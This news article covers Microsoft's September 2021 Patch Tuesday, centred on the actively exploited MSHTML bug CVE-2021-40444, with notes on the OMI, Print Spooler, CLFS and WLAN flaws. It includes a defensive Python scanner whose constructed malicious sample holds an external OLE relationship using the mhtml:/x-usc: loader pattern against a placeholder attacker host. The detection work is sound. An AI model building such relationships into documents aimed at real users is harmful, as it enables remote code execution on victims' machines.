Microsoft Patches Actively Exploited Windows Zero-Day Bug


On Patch Tuesday, Microsoft fixed 66 CVEs, including an RCE bug in MSHTML under active attack as threat actors passed around guides for the drop-dead simple exploit.

In September’s Patch Tuesday crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which – the Windows MSHTML zero-day – has been under active attack for nearly two weeks.

One other bug is listed as publicly known but isn’t (yet) being exploited. Immersive Labs’ Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it’s “quite a light Patch Tuesday” – at least on the surface, that is.

The flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.


Of the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.

Over the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the Zero Day Initiative noted.

Some observers pegged the top patching priority in this month’s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft’s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.

Disclosed on Sept. 7, it’s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.

Under Active Attack: CVE-2021-40444

This serious, simple-to-exploit bug has been under active attack for nearly two weeks, and for nearly a week attackers have been sharing blueprints for carrying out the exploit.

Microsoft said last week that the flaw could let an attacker “craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,” after which “the attacker would then have to convince the user to open the malicious document.” No macros are involved, so the familiar macro warning never fires; the document pulls the malicious control in through the embedded MSHTML engine as soon as it is opened for editing. Microsoft’s advisory noted that documents from the internet open by default in Protected View or Application Guard for Office, both of which block the current attack, which makes a user clicking “Enable Editing” on an unexpected attachment the critical step. The lure is the same one malicious-macro campaigns rely on, and those remain prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a novel malware-obfuscation technique to disable malicious macro warnings and deliver the ZLoader trojan.
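Because the document itself is the delivery vehicle, a useful triage check is to look inside the Office Open XML package for relationships that point at a remote server instead of at content inside the file. The scanner below is an added example written for this article; it is not code from Microsoft, Mandiant or EXPMON. It flags any OLE-object relationship with TargetMode="External", and rates a target that uses the mhtml: / !x-usc: loader pattern as high, since that pattern is what the public proofs of concept used to make MSHTML fetch attacker-controlled HTML (that detail is from the public PoCs, not from the article). The two sample documents are constructed in memory; attacker.invalid is a placeholder host.

```python
"""Flag Office Open XML relationships that pull remote content into a Word
document, the delivery mechanism behind CVE-2021-40444.
Added example for this article; not the vendor's or the reporters' code."""
from __future__ import annotations

import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def _looks_like_mshtml_loader(target: str) -> bool:
    """mhtml: URLs with an !x-usc: suffix are the loader pattern seen in the
    public PoCs (author's knowledge of those PoCs, not a claim of the article)."""
    t = target.lower()
    return t.startswith("mhtml:") or "!x-usc:" in t


def scan_docx(data: bytes) -> list[dict]:
    """Return one finding per suspicious relationship in every .rels part.

    - an OLE object whose TargetMode is External is always reported: a normal
      embedded object lives inside the package, not on a remote server;
    - any target using the mhtml:/x-usc: loader pattern is rated high.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            # ElementTree does not resolve external entities, so parsing an
            # untrusted .rels part here does not expose the scanner to XXE.
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal") == "External"
                loader = _looks_like_mshtml_loader(target)
                if not (loader or (external and rtype == OLE_TYPE)):
                    continue
                findings.append({
                    "part": part,
                    "id": rel.get("Id", ""),
                    "type": rtype.rsplit("/", 1)[-1],
                    "target": target,
                    "severity": "high" if loader else "medium",
                })
    return findings


def build_docx(document_rels: str) -> bytes:
    """Wrap a document.xml.rels part in a minimal .docx container
    (constructed test input, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


# Constructed samples: one modelled on the public PoC layout, one ordinary.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_TYPE}" Target="mhtml:http://attacker.invalid/word.html!x-usc:http://attacker.invalid/word.html" TargetMode="External"/>
</Relationships>"""

BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId3" Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

MALICIOUS_DOCX = build_docx(MALICIOUS_RELS)
BENIGN_DOCX = build_docx(BENIGN_RELS)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, scan_docx(blob))
```

The check is deliberately narrow: external hyperlinks are normal and are not reported, while an OLE object that lives on a remote server has no legitimate reason to exist in a mail attachment. It covers the .docx container only; an RTF file carrying the same OLE object needs a separate RTF parser, and a clean result from this scan is not a substitute for applying the patch.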

Satnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.

“There are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,” Narang told Threatpost.

Last Wednesday, Sept. 8, Kevin Beaumont – head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft – noted that the exploit had been in the wild for about a week or more.

It got worse: Last Thursday, Sept. 9, threat actors began sharing exploit how-tos and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are “simple to follow and [allow] anyone to create their own working version” of the exploit, “including a Python server to distribute the malicious documents and CAB files.”

It took the publication all of 15 minutes to recreate the exploit.

A week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had urged mitigations of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.

Last week, the company didn’t say much about the bug in MSHTML, aka Trident, the HTML engine that has shipped with Windows since Internet Explorer debuted more than 20 years ago and that lets Windows applications parse and render HTML. MSHTML is a component of Windows rather than of the browser, so it remains present and reachable through Office and other hosting applications even on systems where Internet Explorer itself has been disabled.

Microsoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.

Although no security update was available for the vulnerability at that time, Microsoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.

Mitigations That Don’t Mitigate

Tracked as CVE-2021-40444, the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended – mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.

Emphasis on “try to”: Unfortunately, those mitigations proved to be less than foolproof. Researchers, including Beaumont, managed to modify the exploit so that it didn’t rely on ActiveX at all, effectively skirting Microsoft’s mitigations.

The Zero Day Initiative said that for now, the most-effective defense is “to apply the patch and avoid Office docs you aren’t expecting to receive.”

Be sure to review and install every update that applies to your setup: Microsoft lists separate updates for each affected platform, and a host that receives only some of them is not fully protected.

Credit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON.

Baddest Bug Award

The award for baddest bug – or at least, the one with the highest severity rating, with a CVSS score of 9.8 – goes to CVE-2021-38647: a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure.

OMI is an open-source project to further the development of a production-quality implementation of the DMTF CIM/WBEM standards. In practice it is the management agent that several Azure services install on Linux VMs, often without the VM owner noticing, so the hosts to inventory for this one are Linux machines rather than Windows.

“This vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,” the Zero Day Initiative explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.

Yet More PrintNightmare Patches

Microsoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler (CVE-2021-38667, CVE-2021-38671 and CVE-2021-40447), all rated important.

These are the three latest fixes in a steady stream of patches for flaws in Windows Print Spooler that followed the disclosure of PrintNightmare in June. This probably won’t be the last patch in that parade: Tenable’s Narang told Threatpost that “researchers continue to discover ways to exploit Print Spooler” and that the firm expects “continued research in this area.”

Only one – CVE-2021-38671 – of today’s patch trio is rated as “exploitation more likely.” Regardless, organizations should prioritize patching these flaws as “they are extremely valuable to attackers in post-exploitation scenarios,” Narang observed.

More ‘Exploitation More Likely’

Immersive’s Breen told Threatpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver (CVE-2021-36955, CVE-2021-36963, CVE-2021-38633) are also noteworthy, all of them being listed as “exploitation more likely.”

“Local priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,” Breen said via email. “This allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.”

One glaring example of that emerged in May, when hundreds of millions of Dell users were found to be at risk from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.

The three CLFS flaws Microsoft patched on Tuesday aren’t remotely exploitable: an attacker first needs to have achieved code execution on the host by other means. One such way would be via CVE-2021-40444, which is exactly how an Office-document lure and a kernel privilege escalation get chained together.

Two other vulnerabilities – CVE-2021-38639 and CVE-2021-36975, both Win32k escalation of privilege flaws – have also been listed as “exploitation more likely” and, together, cover the full range of supported Windows versions.

Breen said that he’s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They’re not rated as high a severity risk as RCE bugs, but “these local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,” he asserted. “If you can block them here you have the potential to significantly limit their damage.”

He added: “If we assume a determined attacker will be able to infect a victim’s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns.”

Still, This RCE Is Pretty Important

Danny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to CVE-2021-36965 – an important-rated Windows WLAN AutoConfig Service RCE vulnerability – given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privileges or user interaction to exploit; and breadth of affected Windows versions.

The WLAN AutoConfig Service (WlanSvc) is the Windows component that discovers wireless networks, chooses which one a computer will connect to and manages the connection.

The patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.

As the Zero Day Initiative explained, that means an attacker could “completely take over the target – provided they are on an adjacent network.” That would come in quite handy in a coffee-shop attack, where multiple people use an unsecured Wi-Fi network.

This one “is especially alarming,” Kim said: Think SolarWinds and PrintNightmare.

“As recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,” he said in an email.

Kim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.

“It specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker’s end goal,” he predicted. “Remote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deterministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise’s data.”

The Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so “don’t let the adjacent aspect of this bug diminish the severity,” it said. “Definitely test and deploy this patch quickly.”

And Don’t Forget to Patch Chrome

Breen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft’s Chromium-based Edge.

Browsers are, after all, windows into things private, sensitive and valuable to criminals, he said.

“I cannot underestimate the importance of patching your browsers and keeping them up to date,” he stressed. “After all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you’re thinking about your online banking or the data collected and stored by your organization’s web apps, they could all be exposed by attacks that exploit the browser.”

